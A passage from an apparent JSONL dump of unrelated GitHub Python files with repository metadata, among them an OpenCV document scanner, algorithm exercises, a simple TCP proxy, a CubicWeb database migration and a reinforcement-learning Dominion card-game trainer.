requests.get(url, verify=False)\n img_arr = np.array(bytearray(img_resp.content), dtype=np.uint8)\n frame = cv2.imdecode(img_arr, -1)\n frame = imutils.resize(frame, width=frameWidth, height=frameHeight)\n\n frameCnt = frame.copy() # a copy to draw contours onto\n frame_pre = preprocessImage(frame)\n biggest = getContours(frame_pre)\n\n frameWarped = frameCnt\n\n if(biggest.shape != (0,)):\n frameWarped = getWarp(frame, biggest)\n cv2.imwrite('scanned.jpg', frameWarped)\n\n cv2.imshow(\"Original\", frameWarped)\n\ncv2.destroyAllWindows()\n","repo_name":"prateekb1912/document-scanner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71251561126","text":"from Helper import google_bucket\n\n# Create an instance of class: google_bucket\ngoogle = google_bucket()\n\n# Create a new bucket\ngoogle.create_bucket(bucket_name='new_movies_bucket')\n\n# Process the ratings and movies files into DataFrames\nratings = google.process_ratings()\nmovies = google.process_movies()\n\n# Export DataFrames to CSV\ngoogle.export_dataframe_to_csv(dataframe=ratings, csv_name='ratings')\ngoogle.export_dataframe_to_csv(dataframe=movies, csv_name='movies')\n\n# Load CSV files into the new Bucket\ngoogle.load_data(blob_path='movies_project/ratings', file_path='ratings.csv', bucket_name='new_movies_bucket')\ngoogle.load_data(blob_path='movies_project/movies', file_path='movies.csv', bucket_name='new_movies_bucket')\n\n\n","repo_name":"bardadon/Movies-Data-ETL","sub_path":"movies_etl.py","file_name":"movies_etl.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"72840539685","text":"# Brute Force 1 \n# Make a func permute(nums, current_index) to create all permutations.\n# Take cur_index ele, swap cur ele with every other ele in the array to the right. Eg: a, b, c. Swap a with a, then swap b with b, then swap b with c.\n# Move to next index ele, call func.Eg: Swap a with b, then swap a with a, then swap b with c.\n# Time complexity : O(n!)O(n!). A total of n!n! permutations will be generated for an array of length n.\n# Space complexity : O(n).\n \n# public class Solution {\n# int count = 0;\n# public int countArrangement(int N) {\n# int[] nums = new int[N];\n# for (int i = 1; i <= N; i++)\n# nums[i - 1] = i;\n# permute(nums, 0);\n# return count;\n# }\n# public void permute(int[] nums, int l) {\n# if (l == nums.length - 1) {\n# int i;\n# for (i = 1; i <= nums.length; i++) {\n# if (nums[i - 1] % i != 0 && i % nums[i - 1] != 0)\n# break;\n# }\n# if (i == nums.length + 1) {\n# count++;\n# }\n# }\n# for (int i = l; i < nums.length; i++) {\n# swap(nums, i, l);\n# permute(nums, l + 1);\n# swap(nums, i, l);\n# }\n# }\n# public void swap(int[] nums, int x, int y) {\n# int temp = nums[x];\n# nums[x] = nums[y];\n# nums[y] = temp;\n# }\n# }\n\n\n# backtracking\n# check every digit, if cur valid, check next digit, \n# if all digits valid, count+1, once checked, swap back up.\nclass Solution:\n def countArrangement(self, n: int) -> int:\n self.visited = [False]*(n+1)\n self.count = 0\n \n def calculate(n, pos):\n if pos > n: self.count += 1\n for i in range(1, n+1):\n if not self.visited[i] and (pos % i == 0 or i%pos == 0):\n self.visited[i] = True\n calculate(n, pos+1)\n self.visited[i] = False\n \n calculate(n, 1)\n return self.count","repo_name":"yukiyao119/Leetcode-practice","sub_path":"BeautifulArrangement.py","file_name":"BeautifulArrangement.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22324182081","text":"\"\"\"\nСоздать (программно) текстовый файл, записать в него программно набор чисел,\nразделенных пробелами. Программа должна подсчитывать сумму чисел в файле и\nвыводить ее на экран.\nCreate (using a program) a text file and write (with a program) a set of numbers\nseparated by spaces. The program must calculate the sum of the numbers in the\nfile and display it on the screen.\n\"\"\"\n\n\nnumber_sum = 0\nwith open(r\"D:\\Python_basics\\Lesson_5.5.txt\", 'w') as numbers:\n numbers.writelines(input(\"Enter numbers, using space - \"))\nwith open(r\"D:\\Python_basics\\Lesson_5.5.txt\") as numbers:\n for line in numbers:\n numbers_list = line.split()\n for i in numbers_list:\n number_sum = number_sum + int(i)\n print(number_sum)\n","repo_name":"freebrains/Python_basics","sub_path":"Lesson_5.5.py","file_name":"Lesson_5.5.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8664935055","text":"import socket\napaaddr=('127.0.0.1',8088)\nseraddr=('127.0.0.1',8080)\nser=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\napaser=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nser.bind(seraddr)\nser.listen(5)\npoll=[]\nwhile True:\n\tcon,addr=ser.accept()\n\tpoll.append(con)\n\n\twhile len(poll):\n\t\tc=poll.pop(0)\n\t\tbuf=c.recv(1024)\n\t\tif not buf:\n\t\t\tcontinue\n\t\tapaser.connect(apaaddr)\n\t\tapaser.send(buf)\n\t\tdata=apaser.recv(1024)\n\t\tc.send(data)\n\t\tc.close()\n\t\tapaser.close()","repo_name":"JamesLinus/OMMPS","sub_path":"proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75236483044","text":"import enum\n\nclass Results(enum.Enum):\n SUBLIST = 0\n SUPERLIST = 1\n EQUAL = 2\n UNEQUAL = 3\n\n\n# Possible sublist categories.\n# Change the values as you see fit.\nSUBLIST = Results.SUBLIST\nSUPERLIST = Results.SUPERLIST\nEQUAL = Results.EQUAL\nUNEQUAL = Results.UNEQUAL\n\n\ndef sublist(list_one, list_two):\n if list_one == list_two:\n return EQUAL\n\n r = SUBLIST\n if len(list_one) > len(list_two):\n list_one, list_two = list_two, list_one\n r = SUPERLIST\n\n for i in range(len(list_two) - len(list_one) + 1):\n if list_one == list_two[i:i + len(list_one)]:\n return r\n\n return UNEQUAL\n","repo_name":"IsaacG/exercism","sub_path":"python/sublist/sublist.py","file_name":"sublist.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"36278723948","text":"from collections import deque\n\nclass Node:\n\tdef __init__(self, name, nodes=[], number=None):\n\t\tself.name = name\n\t\tself.nodes = nodes\n\t\tself.number = number\n\tdef __repr__(self):\n\t\treturn \"\" % self.name\n\nclass Tree:\n\tdef __init__(self, nodes=set(), HEAD=None):\n\t\tself.nodes = nodes\n\t\tself.HEAD = HEAD\n\n# Tree from the pluralsight.com Algorithmics Course used as an example\n\n\nprint('''\n--------------------------------------------\n\tStarting DFS\n--------------------------------------------\n''')\n\n\nA = Node('A')\nB = Node('B')\nC = Node('C')\nD = Node('D')\nE = Node('E')\nF = Node('F')\nG = Node('G')\nH = Node('H')\nI = Node('I')\n\nA.nodes = [B, C]\nB.nodes = [D, E]\nC.nodes = [E, F]\nD.nodes = [G]\nE.nodes = []\nF.nodes = [G, H, I]\nG.nodes = [D, E]\nH.nodes = []\nI.nodes = []\n\nnode_set = {A, B, C, D, E, F, G, H, I}\ndfs_tree = Tree(nodes=node_set, HEAD = A)\n\nSTACK = []\ndfs_count = 1\n\ndfs_starting_node = dfs_tree.HEAD\ndfs_starting_node.number = dfs_count\ndfs_count+=1\n\n\n\ndef traverse_tree(starting_node):\n\tglobal dfs_count\n\tfor node in starting_node.nodes:\n\t\t# If node has been visited, just go to the next node in the stack\n\t\tif node.number is not None:\n\t\t\tcontinue\n\t\t# We're stacking from right to left\n\t\tSTACK.append(node)\n\t\tprint(\"Added %s\" % node)\n\tprint(\"Current Stack: [%s]\" % ', '.join([i.name for i in STACK]))\n\tif STACK:\n\t\tnew_node=STACK.pop()\n\t\t# Only tag nodes that haven't been visited\n\t\tif new_node.number is None:\n\t\t\tnew_node.number=dfs_count\n\t\t\tdfs_count+=1\n\t\treturn traverse_tree(new_node)\n\telse:\n\t\tprint(\"Stack empty. Ending recursion.\")\n\t\treturn\n\ntraverse_tree(dfs_starting_node)\n\ndfs_number_dict = {node.name: node.number for node in dfs_tree.nodes}\n\nprint('''\nNode Order:\n''')\n\nfor k, v in sorted(dfs_number_dict.items()):\n\tprint(\"Node %s: %s\" % (k, v))\n\n\nprint('''\n--------------------------------------------\n\tStarting BFS\n--------------------------------------------\n''')\n\nA = Node('A')\nB = Node('B')\nC = Node('C')\nD = Node('D')\nE = Node('E')\nF = Node('F')\nG = Node('G')\nH = Node('H')\nI = Node('I')\n\nA.nodes = [B, C]\nB.nodes = [D, E]\nC.nodes = [E, F]\nD.nodes = [G]\nE.nodes = []\nF.nodes = [G, H, I]\nG.nodes = [D, E]\nH.nodes = []\nI.nodes = []\n\nnode_set = {A, B, C, D, E, F, G, H, I}\nbfs_tree = Tree(nodes=node_set, HEAD = A)\n\nQUEUE = deque([])\nbfs_count = 1\n\nbfs_starting_node = bfs_tree.HEAD\nbfs_starting_node.number = bfs_count\nbfs_count+=1\n\n\ndef traverse_tree_bfs(starting_node):\n\tglobal bfs_count\n\tfor node in starting_node.nodes:\n\t\t# If node has been visited, just go to the next node in the stack\n\t\tif node.number is not None:\n\t\t\tcontinue\n\t\t# We're stacking from right to left\n\t\tQUEUE.append(node)\n\t\tprint(\"Added %s\" % node)\n\tprint(\"Current Queue: [%s]\" % ', '.join([i.name for i in QUEUE]))\n\tif QUEUE:\n\t\tnew_node=QUEUE.popleft()\n\t\t# Only tag nodes that haven't been visited\n\t\tif new_node.number is None:\n\t\t\tnew_node.number=bfs_count\n\t\t\tbfs_count+=1\n\t\treturn traverse_tree_bfs(new_node)\n\telse:\n\t\tprint(\"Queue empty. Ending recursion.\")\n\t\treturn\n\ntraverse_tree_bfs(bfs_starting_node)\n\nbfs_number_dict = {node.name: node.number for node in bfs_tree.nodes}\n\nprint('''\nNode Order:\n''')\n\nfor k, v in sorted(bfs_number_dict.items()):\n\tprint(\"Node %s: %s\" % (k, v))\n\n","repo_name":"szuckerman/linked_list_examples","sub_path":"depth_first_search.py","file_name":"depth_first_search.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74783484965","text":"\nfrom functools import partial\n\nfrom yams.constraints import UniqueConstraint\n\nfrom cubicweb.schema import PURE_VIRTUAL_RTYPES\nfrom cubicweb.server.schema2sql import build_index_name, check_constraint\n\nsql = partial(sql, ask_confirm=False)\n\nsource = repo.system_source\nhelper = source.dbhelper\n\n# drop all relations primary keys\nfor table, cstr in sql('''\n SELECT DISTINCT tc.table_name, tc.constraint_name\n FROM information_schema.table_constraints tc,\n information_schema.key_column_usage kc\n WHERE tc.constraint_type = 'PRIMARY KEY'\n AND kc.table_name = tc.table_name\n AND kc.table_name LIKE '%\\_relation'\n AND kc.table_schema = tc.table_schema\n AND kc.constraint_name = tc.constraint_name;\n'''):\n sql('ALTER TABLE %s DROP CONSTRAINT %s' % (table, cstr))\n\nfor table, cstr in sql(\"\"\"\n SELECT DISTINCT table_name, constraint_name FROM information_schema.constraint_column_usage\n WHERE table_name LIKE 'cw\\_%' AND constraint_name LIKE '%\\_key'\"\"\"):\n sql('ALTER TABLE %s DROP CONSTRAINT %s' % (table, cstr))\n\nfor rschema in schema.relations():\n if rschema.rule or rschema in PURE_VIRTUAL_RTYPES:\n continue\n if rschema.final or rschema.inlined:\n for rdef in rschema.rdefs.values():\n table = 'cw_{0}'.format(rdef.subject)\n column = 'cw_{0}'.format(rdef.rtype)\n if rschema.inlined or rdef.indexed:\n old_name = '%s_%s_idx' % (table.lower(), column.lower())\n sql('DROP INDEX IF EXISTS %s' % old_name)\n source.create_index(cnx, table, column)\n else:\n table = '{0}_relation'.format(rschema)\n sql('ALTER TABLE %s ADD CONSTRAINT %s PRIMARY KEY(eid_from, eid_to)'\n % (table, build_index_name(table, ['eid_from', 'eid_to'], 'key_')))\n for column in ('from', 'to'):\n sql('DROP INDEX IF EXISTS %s_%s_idx' % (table, column))\n sql('CREATE INDEX %s ON %s(eid_%s);'\n % (build_index_name(table, ['eid_' + column], 'idx_'), table, column))\n\n# we changed constraint serialization, which also changes their name\n\nfor table, cstr in sql(\"\"\"\n SELECT DISTINCT table_name, constraint_name FROM information_schema.constraint_column_usage\n WHERE constraint_name LIKE 'cstr%'\"\"\"):\n sql(\"ALTER TABLE %(table)s DROP CONSTRAINT %(cstr)s\" % locals())\n\nfor cwconstraint in rql('Any C WHERE R constrained_by C').entities():\n cwrdef = cwconstraint.reverse_constrained_by[0]\n rdef = cwrdef.yams_schema()\n cstr = rdef.constraint_by_eid(cwconstraint.eid)\n with cnx.deny_all_hooks_but():\n cwconstraint.cw_set(value=unicode(cstr.serialize()))\n if cstr.type() not in ('BoundaryConstraint', 'IntervalBoundConstraint',\n 'StaticVocabularyConstraint'):\n # These cannot be translate into backend CHECK.\n continue\n cstrname, check = check_constraint(rdef, cstr, helper, prefix='cw_')\n args = {'e': rdef.subject.type, 'c': cstrname, 'v': check}\n sql('ALTER TABLE cw_%(e)s ADD CONSTRAINT %(c)s CHECK(%(v)s)' % args)\n\ncommit()\n\nif 'identity_relation' in helper.list_tables(cnx.cnxset.cu):\n sql('DROP TABLE identity_relation')\n","repo_name":"gurneyalex/cubicweb","sub_path":"cubicweb/misc/migration/3.23.0_Any.py","file_name":"3.23.0_Any.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43191518315","text":"import pandas as pd\r\n\r\nimport spacy\r\nnlp = spacy.load('el_core_news_sm') #pretrained statistical model fro Greek\r\nbooks = pd.read_csv(\"../clear_phase/Processed-Books.csv\")\r\n\r\nbooks = books.head(10) #so as to compute quickly\r\n\r\n\r\n\r\ndef lemmatize(books):\r\n\r\n\r\n tokenized_books = books\r\n periexomena = []\r\n\r\n for desc in tokenized_books['Περιεχόμενα']:\r\n descInToken = []\r\n #print(desc)\r\n token = nlp(desc)\r\n\r\n for w in token:\r\n #print(w,w.lemma_)\r\n descInToken.append(w.lemma_) #gia kathe leksi vrisko to lemma tis\r\n\r\n periexomena.append(descInToken)\r\n\r\n #print(periexomena)\r\n tokenized_books['Περιεχόμενα'] = periexomena # gia kathe perigrafi vazo oles tis lekseis me ta lemmata tous\r\n\r\n return tokenized_books\r\n#tb = tokenize(books)\r\n\r\ntb = lemmatize(books)\r\n\r\n#print(tb['Περιεχόμενα'])","repo_name":"vlavrent/NLP-Book-Classifier","sub_path":"preprocessing_phase/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74969068003","text":"from rl_agent import RLPlayer, RandomPlayer, BuyActRLplayer\nimport numpy as np\nimport tensorflow as tf\nfrom cards import copper, silver, gold, curse, estate, duchy, province, CARD_VECTOR_ORDER,variable_cards\nfrom game import Game, PlayerState, VICTORY_CARDS\nimport time\nimport random\n\nclass SarsaBootstrapAgent():\n \"\"\"\n Bootstrap DQL method in DQLSarsaAgent does not work that well\n Try using on plicy \n \"\"\"\n\n def __init__(self, epochs=10, gamma=0.99):\n self.epochs = epochs\n self.target_iterations = 5\n self.predict_iterations = 200\n # number of samples drawn every time\n self.mtrain = 2000\n self.gamma = gamma\n self.epsilon = 0.1\n #self.create_model()\n self.data = []\n self.replaybuffer = 4e5\n self.win_reward = 0\n self.reward_points_per_turn = 0\n self.VICTORY_CARDS = VICTORY_CARDS\n self.variable_cards = variable_cards\n\n def create_model(self, sa, target, num_layers=3, dropout=0.2):\n def _make_model(num_layers, dropout):\n layers = []\n for _ in range(num_layers - 1):\n layers.append(tf.keras.layers.Dense(128, activation='relu'))\n layers.append(tf.keras.layers.Dropout(dropout))\n layers.append(tf.keras.layers.Dense(30, activation='relu'))\n layers.append(tf.keras.layers.Dropout(dropout))\n layers.append(tf.keras.layers.Dense(1, activation='linear'))\n model = tf.keras.models.Sequential(layers)\n model.compile(optimizer='adam',\n loss='mean_squared_error',\n metrics=['mean_squared_error'])\n return model\n model = _make_model(num_layers, dropout)\n # initiate network\n model.fit(sa, target, epochs=1, verbose=1)\n self.model_predict = model\n # target network\n model = _make_model(num_layers, dropout)\n # initiate network\n model.fit(sa, target, epochs=1, verbose=1)\n self.model_target = model\n return\n\n def run(self, players):\n game = self.setup(players, self.variable_cards, self.VICTORY_CARDS)\n # seems to have a bug that does not terminate game\n # set a limit of 5000 turns\n k = 0\n while not game.over():\n if k > 5000:\n print('terminate after 5000 turns!')\n break\n else:\n game = game.take_turn()\n k += 1\n scores = [(state.player, state.score()) for state in game.playerstates]\n # This code is buggy... It picks the same guy when there's a tie\n #winner, _ = max(scores, key=lambda item: item[1])\n #loser, _ = max(scores, key=lambda item: item[1])\n # write stupid code instead. No win reward when there's a tie\n if scores[0][1] > scores[1][1]:\n winner = scores[0][0]\n loser = scores[1][0]\n win_reward_multiplier = 1\n elif scores[0][1] == scores[1][1]:\n win_reward_multiplier = 0\n winner = scores[0][0]\n loser = scores[1][0]\n else:\n winner = scores[1][0]\n loser = scores[0][0]\n win_reward_multiplier = 1\n # check if list is empty before adding reward\n if winner.rewards:\n winner.rewards[-1] += self.win_reward * win_reward_multiplier\n if loser.rewards:\n loser.rewards[-1] += -self.win_reward * win_reward_multiplier\n # append to vp the win_reward\n if winner.vp:\n winner.vp.append(self.win_reward * win_reward_multiplier)\n if loser.vp:\n loser.vp.append(self.win_reward * win_reward_multiplier)\n # add a reward that incentivize points per round\n for p, s in scores:\n p.rewards[-1] += 100 * s / k * self.reward_points_per_turn\n # add a reward of points per turn to act_reward also\n if p.vp != []:\n p.vp[\n -1] += s # add the final score to additional element of vp. this is used to calculate the reward for the final s,a\n p.vp[-1] += 100 * s / k * self.reward_points_per_turn\n return scores\n\n def scores_to_data(self, scores):\n \"\"\"\n Each data point consistes of a tuple (s,a,r,s',a',a'_opt)\n s: state\n a: action\n r: reward\n s': next state\n a'_opt: next state\n last_marker: 1 if it's the last state, 0 if not\n What do we do for the last step?\n set the training target to zero I guess\n\n \"\"\"\n for player, fs in scores:\n if not player.record_history:\n continue\n # for buy phase\n d_buy = []\n for i in range(len(player.states) - 1):\n s = np.array(player.states[i])\n a = np.array(player.actions[i])\n r = np.array(player.rewards[i])\n sn = np.array(player.states[i + 1])\n an = np.array(player.actions[i + 1]) # next action\n d_buy.append((s, a, r, sn, an,\n 0)) # 0 means that it is not the end of the sequence\n # deal with the last state\n s = np.array(player.states[-1])\n a = player.actions[-1]\n r = np.array(player.rewards[-1])\n d_buy.append((s, a, r, None, None, 1))\n # for action phase\n d_act = []\n if player.states_act: # if not empty\n for i in range(len(player.states_act) - 1):\n s_act = np.array(player.states_act[i])\n a_act = player.actions_act[i]\n r_act = np.array(player.vp[i + 1] - player.vp[i])\n sn_act = np.array(player.states_act[i + 1])\n an_act = np.array(player.actions_act[i + 1])\n d_act.append((s_act, a_act, r_act, sn_act, an_act,\n 0)) # 0 means not the end of sequence\n # deal with the last state, in run() function, we already appended the final score and terminal reward to player.vp\n # so player.vp is one longer than the other lists\n s_act = np.array(player.states_act[-1])\n a_act = player.actions_act[-1]\n r_act = np.array(player.vp[-1] - player.vp[-2])\n d_act.append((s_act, a_act, r_act, None, None, 1))\n final_score = {bot: fs for bot, fs in scores}\n\n return d_buy, d_act, final_score\n\n def record_game(self, n, players, filename='', verbose=1):\n \"\"\"\n run n games and record to data\n use the output of scores_to_data\n \"\"\"\n start_time = time.time()\n final_scores = {bot: [] for bot in players}\n d_buy = []\n d_act = []\n for i in range(n):\n if i % 100 == 0:\n print('Playing game# %d' % i)\n # clear player history\n for p in players:\n p.reset_history()\n db_this, da_this, fs = self.scores_to_data(self.run(players))\n d_buy += db_this\n d_act += da_this\n for bot, fs_this in fs.items():\n final_scores[bot].append(fs_this)\n print('Took %.3f seconds' % (time.time() - start_time))\n # show the winrate of bots in the recorded games\n bot1, bot2 = final_scores.keys()\n bot1win = np.sum(\n np.array(final_scores[bot1]) > np.array(final_scores[bot2]))\n bot2win = len(final_scores[bot1]) - bot1win\n bot1avg = np.mean(final_scores[bot1])\n bot2avg = np.mean(final_scores[bot2])\n if verbose:\n print({bot1: bot1win, bot2: bot2win})\n print({bot1: bot1avg, bot2: bot2avg})\n if filename != '':\n with open(filename, 'wb') as f:\n pickle.dump((d_buy, d_act), f)\n return (d_buy, d_act)\n\n def compute_target_old(self, data):\n \"\"\"\n compute_target use the target network to predict the Q value\n n is the next state\n with a Q(s,a) model\n compute r + gamma*max_a' Q(s',a')\n It outputs the target that the deep neural network wants to fit for.\n a' are the possible actions\n \"\"\"\n sa = []\n target = []\n for (s, a, r, ns, na, isend) in data:\n sa.append(np.concatenate([s, a]))\n if not isend:\n qn = self.model_target.predict(np.concatenate([ns, na]).reshape(1,-1))\n target.append(r + self.gamma * qn)\n else:\n target.append(r)\n sa = np.array(sa)\n target = np.array(target)\n return sa, target\n\n def compute_target(self, data):\n \"\"\"\n compute_target use the target network to predict the Q value\n n is the next state\n with a Q(s,a) model\n compute r + gamma*max_a' Q(s',a')\n It outputs the target that the deep neural network wants to fit for.\n a' are the possible actions\n Try to parallelize the model.predict() part\n this is 10 times faster that the old code\n \"\"\"\n safull = []\n ind = []\n target = []\n sa = []\n for i, (s, a, r, ns, na, isend) in enumerate(data):\n sa.append(np.concatenate([s, a]))\n target.append(float(r))\n if not isend:\n safull.append(np.concatenate([ns, na]).reshape(1, -1))\n ind.append(i) # record which data point each sa belongs to\n safull = np.concatenate(safull)\n ind = np.asarray(ind, dtype=int)\n Qp = self.model_target.predict(safull)\n for i in np.unique(ind): # loop over data point i that are not terminal s,a\n # pretty inefficient, but shouldn't be the bottle neck\n target[i] += self.gamma * Qp[np.where(ind == i)[0]]\n target = np.array(target)\n sa = np.array(sa)\n return sa, target\n\n\n def draw_sample(self):\n \"\"\"\n draw random samples from the full dataset generated\n \"\"\"\n # for buy training\n m = self.data[1].shape[0]\n select1 = np.random.choice(m, self.mtrain, replace=False)\n # for action training\n m = self.data[4].shape[0]\n select2 = np.random.choice(m, self.mtrain, replace=False)\n return tuple([d[select1, :] for d in self.data[:4]] +\n [d[select2, :] for d in self.data[4:]])\n\n ###### below are functions for generating training data\n def generate_data(self, ngames=50, fname=''):\n \"\"\"\n generate a new batch of data with the latest prediction model\n self.model_predict\n rl vs. random bot\n \"\"\"\n vbuy = lambda x: self.model_predict.predict(x)\n # vact = lambda x: self.model_act.predict(x)\n # p1 = BuyActRLplayer(vbuy, vact)\n p1 = RLPlayer(vbuy)\n p1.epsilon = self.epsilon\n p1.record_history = 1\n p1.include_action = 1\n p2 = RandomPlayer()\n p2.record_history = 0\n d_this, _ = self.record_game(ngames, [p1, p2], fname)\n self.add_data(d_this)\n return d_this\n\n def generate_data_smithy(self, ngames=50, fname=''):\n \"\"\"\n generate a new batch of data with the latest prediction model\n self.model_predict\n rl vs. smithy bot\n \"\"\"\n vbuy = lambda x: self.model_predict.predict(x)\n # vact = lambda x: self.model_act.predict(x)\n # p1 = BuyActRLplayer(vbuy, vact)\n p1 = RLPlayer(vbuy)\n p1.epsilon = self.epsilon\n p1.record_history = 1\n p1.include_action = 1\n p2 = SmithyBot()\n # try including smithy bot's data in the training.\n p2.record_history = 0\n d_this, _ = self.record_game(ngames, [p1, p2], fname)\n self.add_data(d_this)\n return d_this\n\n def generate_data_rl(self, ngames=50, fname=''):\n \"\"\"\n generate a new batch of data with the latest prediction model\n self.model_predict\n rl vs. smithy bot\n \"\"\"\n vbuy = lambda x: self.model_predict.predict(x)\n #vact = lambda x: self.model_act.predict(x)\n # p1 = BuyActRLplayer(vbuy, vact)\n p1 = RLPlayer(vbuy)\n p1.epsilon = self.epsilon\n p1.record_history = 1\n p1.include_action = 1\n p2 = RLPlayer(vbuy)\n p2.epsilon = self.epsilon\n p2.record_history = 1\n p2.include_action = 1\n d_this, _ = self.record_game(ngames, [p1, p2], fname, verbose=1)\n self.add_data(d_this)\n return d_this\n\n def save_model(self, fname='test'):\n self.model_predict.save_weights(fname + '_predict.h5')\n self.model_target.save_weights(fname + '_target.h5')\n return\n\n def load_model(self, fname='test'):\n self.model_predict.load_weights(fname + '_predict.h5')\n self.model_target.load_weights(fname + '_target.h5')\n return\n\n def compare_bots(self, bots, num_games=50):\n start_time = time.time()\n wins = {bot: 0 for bot in bots}\n final_scores = {bot: [] for bot in bots}\n for i in range(num_games):\n random.shuffle(bots)\n game = self.setup(bots, self.variable_cards, self.VICTORY_CARDS)\n results = game.run()\n maxscore = 0\n for bot, score in results:\n final_scores[bot].append(score)\n if score > maxscore:\n maxscore = score\n for bot, score in results:\n if score == maxscore:\n wins[bot] += 1\n break\n for bot in final_scores.keys():\n final_scores[bot] = np.mean(final_scores[bot])\n print('Took %.3f seconds' % (time.time() - start_time))\n return wins, final_scores\n\n def fit_target(self, data):\n \"\"\"Fit_target_network.\n\n Computes the target network prediction and fit for it with prediction\n network.\n \"\"\"\n # state, action, reward, next state\n sa, target = self.compute_target(data)\n self.model_predict.fit(sa, target, epochs=self.epochs, verbose=1)\n return\n\n def do_target_iteration(self):\n for j in range(self.target_iterations):\n #print('start target model iteration {:d}'.format(j))\n # set the weights of the target model to predict model\n self.model_target.set_weights(self.model_predict.get_weights())\n for i in range(self.predict_iterations):\n print('prediction model iteration {:d}'.format(i))\n self.fit_target(self.draw_sample())\n\n def draw_sample(self):\n \"\"\"Draws random samples from the full dataset generated.\"\"\"\n m = len(self.data)\n select = np.random.choice(m, self.mtrain, replace=False)\n return self.data[select]\n\n def add_data(self, data):\n if self.data == []:\n self.data = np.array(data)\n else:\n self.data = np.concatenate([self.data, np.array(data)])\n # truncate data down to replay buffer size\n if self.data.shape[0] > self.replaybuffer:\n print('truncate {:d} samples'.format(self.data.shape[0] -\n self.replaybuffer))\n self.data = self.data[-self.replaybuffer:]\n return\n\n def add_data_act(self, data):\n if self.data_act == []:\n self.data_act = np.array(data)\n else:\n self.data_act = np.concatenate([self.data_act, np.array(data)])\n # truncate data_act down to replay buffer size\n if self.data_act.shape[0] > self.replaybuffer:\n print('truncate {:d} samples'.format(self.data_act.shape[0] -\n self.replaybuffer))\n self.data_act = self.data_act[-self.replaybuffer:]\n return\n\n def setup(self, players, var_cards=(), VICTORY_CARDS=VICTORY_CARDS, simulated=True):\n \"\"\"Set up the game.\n\n Put this here because I want to try out different numbers of province. I'm\n hoping that in a longer game,\n the AI can learn to play engine.\n \"\"\"\n counts = {\n estate: VICTORY_CARDS[len(players)],\n duchy: VICTORY_CARDS[len(players)],\n province: VICTORY_CARDS[len(players)],\n curse: 10 * (len(players) - 1),\n copper: 60 - 7 * len(players),\n silver: 40,\n gold: 30\n }\n counts.update({card: 10 for card in var_cards})\n playerstates = [PlayerState.initial_state(p) for p in players]\n random.shuffle(playerstates)\n return Game(playerstates, counts, turn=0, simulated=simulated)\n","repo_name":"hungiyang/dominiate","sub_path":"dominiate/sarsa_on_policy_trainer.py","file_name":"sarsa_on_policy_trainer.py","file_ext":"py","file_size_in_byte":15048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19886695251","text":"from DIRAC import S_OK, S_ERROR\nfrom DIRAC.WorkloadManagementSystem.Splitters.BaseSplitter import BaseSplitter\n\nclass InputDataBySESplitter( BaseSplitter ):\n\n AFTER_OPTIMIZER = \"InputDataResolution\"\n\n def splitJob( self, jobState ):\n result = jobState.getManifest()\n if not result[ 'OK' ]:\n return result\n jobManifest = result[ 'Value' ]\n maxIDPerJob = max( 1, jobManifest.getOption( \"SplitterMaxFilesPerJob\", 1 ) )\n result = jobState.getInputData( )\n if not result[ 'OK' ]:\n self.jobLog.error( \"Could not retrieve input data: %s\" % result[ 'Message' ] )\n return result\n data = result[ 'Value' ]\n if not data:\n self.jobLog.error( \"No input data defined\" )\n return S_ERROR( \"No input data defined\" )\n seContents = {}\n for lfn in data:\n for seName in data[ lfn ][ 'Replicas' ]:\n if seName not in seContents:\n seContents[ seName ] = set()\n seContents[ seName ].add( lfn )\n\n manifests = []\n seCounters = dict( [ ( seName, 0 ) for seName in seContents ] )\n while seContents:\n seName = sorted( [ ( seCounters[ seName ], seName ) for seName in seCounters ] )[0][-1]\n seData = seContents[ seName ]\n lfns = []\n for i in range( maxIDPerJob ):\n try:\n lfn = seData.pop()\n except KeyError:\n break\n lfns.append( lfn )\n for otherSE in seContents:\n try:\n seContents[ otherSE ].remove( lfn )\n except:\n pass\n seCounters[ seName ] += len( lfns )\n if len( lfns ) < maxIDPerJob :\n seContents.pop( seName )\n seCounters.pop( seName )\n if lfns:\n self.jobLog.info( \"Generated manifest to %s with %s lfns\" % ( seName, len( lfns ) ) )\n manifest = jobManifest.clone()\n manifest.setOption( \"InputData\", \",\".join( lfns ) )\n manifest.setOption( \"SplitterChosenSE\", seName )\n manifests.append( manifest )\n\n return S_OK( manifests )\n","repo_name":"coberger/DIRAC","sub_path":"WorkloadManagementSystem/Splitters/InputDataBySESplitter.py","file_name":"InputDataBySESplitter.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"74163191526","text":"from datetime import datetime\nfrom .api_connections import RequestEventsRawData\nfrom .api_connections import RequestEventsInPeriod\nfrom .api_connections import EmptyRequest\nfrom .models import EventData\nfrom .models import EventLanguage\nfrom .models import LastUpdateEventDate\nfrom .views import populate_event_data\nfrom quero_cultura.views import ParserYAML\nimport requests_mock\nimport json\n\n\nclass TestLastUpdateEventDate(object):\n\n 